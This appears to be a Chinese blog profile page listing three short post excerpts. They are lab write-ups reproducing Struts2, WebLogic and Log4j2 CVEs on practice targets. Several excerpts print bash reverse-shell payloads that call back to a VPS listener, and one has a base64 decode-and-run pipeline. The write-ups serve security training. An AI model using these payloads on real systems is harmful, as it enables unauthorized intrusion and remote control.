- 博客(3)
- 收藏
- 关注
原创 struts2 命令执行(CVE-2013-1965)
其中的"bash -i >%26 /dev/tcp/ip/port 0>%261"中的ip指的是vps的地址,port指的是你开启的监听端口。3:开启监听端口(我这里开启8888)并发送burpsuite中的重发器内容,若出现500状态码则是发送成功。小tips:如果你的监听一直失败:可能是你的监听没有打开,你需要在你的vps服务器上打开你的所有端口。输入指令:find / -name flag*即可得到flag。payload参考的是csdn的一位大佬的笔记。一:工具:burpsuite、vps服务器。
2024-04-07 20:58:10 439 3
原创 weblogic cve-2017-10271漏洞复现(vulfocus)
此处的bash -i >& /dev/tcp/ip/port 0>&1中的ip为你的vps服务器的地址,port为你开启监听的端口(我这里开启监听的端口是8888)小tips:如果你的监听一直失败:可能是你的监听没有打开,你需要在你的vps服务器上打开你的所有端口。(指令:find / -name flag*)温馨提示:要先开启监听端口在进行burpsuite反向shell发送。4:开启远程监听(我这里使用的是8888端口开启监听)并获得权限。一:工具:burpsuite、vps服务器。
2024-04-07 20:31:00 414 2
原创 log4j2远程执行代码CVE-2021-44228复现(vulfocus靶场)
bash -i >& /dev/tcp/(你服务器的公网IP地址)/8888(监听的端口号,我这里使用的是8888端口) 0>&1。1:首先打开finalshell或其他本地服务器上传,先创建一个ddd文件夹,并把下载的工具转移到该目录。}|{base64,-d}|{bash,-i}" -A "(你服务器的公网IP地址)"5:打开另一个终端端口并开启监听8888端口(8888端口是你在前面设置的监听端口)这样子就成功监听到端口,先进入tmp目录下,在输入ls可以爆出flag;6:用burpsuite抓包。
2024-03-31 01:35:12 392
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人